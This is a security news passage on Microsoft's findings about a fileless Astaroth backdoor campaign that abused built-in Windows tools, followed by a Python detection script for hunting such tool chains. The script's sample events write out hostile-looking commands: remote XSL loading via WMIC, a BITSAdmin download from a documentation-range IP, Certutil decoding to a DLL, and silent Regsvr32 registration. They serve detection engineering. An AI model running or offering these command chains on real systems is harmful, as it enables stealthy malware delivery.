Microsoft’s Defender ATP Research Team yesterday revealed its discovery of a late-spring fileless malware campaign that used "living-off-the-land" techniques to infect victims with the information-stealing Astaroth backdoor.
The attackers behind this campaign abused multiple legitimate Windows tools to deliver the final payload, including the Windows Management Instrumentation Command-line tool (WMIC), the BITSAdmin command-line tool, the Certutil certificate services command-line tool, the Regsvr32 command-line utility and the Userinit system tool.
"It's interesting to note that at no point during the attack chain is any file run that's not a system tool," remarked Andrea Lelli, a member of the Defender ATP Research Team, in a company blog post. "In other words, they [the attackers] use fileless techniques to silently install the malware on target devices."
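As an added illustration (not code from the article or from Microsoft's report), the following Python sketch shows how a detection engineer might hunt for this kind of living-off-the-land chain in process-creation telemetry. Any one of these tools is common in legitimate administration, so the signal is several of them appearing on the same host in suspicious forms, not any single execution. The sample events, host names and command-line heuristics below are constructed assumptions about how these tools are commonly abused; they are not the campaign's actual command lines.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed process-creation events in the shape of Sysmon Event ID 1 /
# Security 4688 records. These are NOT telemetry from the Astaroth campaign.
SAMPLE_EVENTS = [
    {"host": "ws01", "parent": "explorer.exe", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": 'wmic os get /format:"http://203.0.113.10/x.xsl"'},
    {"host": "ws01", "parent": "wmic.exe", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job /priority high http://203.0.113.10/p.txt C:\Users\Public\p.txt"},
    {"host": "ws01", "parent": "wmic.exe", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -decode C:\Users\Public\p.txt C:\Users\Public\p.dll"},
    {"host": "ws01", "parent": "wmic.exe", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 /s C:\Users\Public\p.dll"},
    {"host": "ws01", "parent": "regsvr32.exe", "image": r"C:\Windows\System32\userinit.exe",
     "cmdline": "userinit.exe"},
    # Benign admin use on a second host: isolated tools, ordinary arguments.
    {"host": "ws02", "parent": "cmd.exe", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -hashfile C:\tools\setup.msi SHA256"},
    {"host": "ws02", "parent": "explorer.exe", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic os get caption"},
]


@dataclass(frozen=True)
class Rule:
    tool: str                              # process basename without .exe
    description: str
    cmd_pattern: Optional[re.Pattern] = None   # command-line heuristic (assumed)
    expected_parent: Optional[str] = None      # flag only if parent differs


# Heuristics (assumptions about common abuse, not the campaign's exact arguments):
RULES = [
    Rule("wmic", "WMIC loading a remote XSL stylesheet",
         re.compile(r'/format:\s*"?(https?|ftp)://', re.I)),
    Rule("bitsadmin", "BITSAdmin downloading a file",
         re.compile(r"/transfer\b.*(https?|ftp)://", re.I)),
    Rule("certutil", "Certutil decoding or fetching a payload",
         re.compile(r"(-|/)(decode|decodehex|urlcache)\b", re.I)),
    Rule("regsvr32", "Regsvr32 silently registering a DLL or scriptlet",
         re.compile(r"/s\b|/i:|scrobj", re.I)),
    # Userinit is normally started only by winlogon.exe during logon.
    Rule("userinit", "Userinit started outside the logon sequence",
         expected_parent="winlogon"),
]


def basename(path: str) -> str:
    """Lower-case file name without directory or .exe suffix."""
    name = path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def rule_matches(rule: Rule, event: dict) -> bool:
    if basename(event["image"]) != rule.tool:
        return False
    if rule.cmd_pattern and not rule.cmd_pattern.search(event["cmdline"]):
        return False
    if rule.expected_parent and basename(event["parent"]) == rule.expected_parent:
        return False
    return True


def find_hits(events: List[dict]) -> List[Tuple[str, str, str]]:
    """Return (host, tool, description) for every event matching a rule."""
    return [(ev["host"], r.tool, r.description)
            for ev in events for r in RULES if rule_matches(r, ev)]


def flagged_hosts(events: List[dict], min_distinct_tools: int = 3) -> List[str]:
    """Hosts on which at least min_distinct_tools different LOLBins were abused."""
    per_host: Dict[str, set] = {}
    for host, tool, _ in find_hits(events):
        per_host.setdefault(host, set()).add(tool)
    return sorted(h for h, tools in per_host.items() if len(tools) >= min_distinct_tools)


if __name__ == "__main__":
    for host, tool, desc in find_hits(SAMPLE_EVENTS):
        print(f"{host}: {tool}: {desc}")
    print("flagged:", flagged_hosts(SAMPLE_EVENTS))
```

The per-host threshold is the design point: certutil hashing an installer or WMIC querying the OS on ws02 produces no alert, while ws01, where five system binaries chain into one another with download, decode and registration arguments, is flagged. In production the same grouping would key on a time window and on the parent/child relationship rather than on host alone.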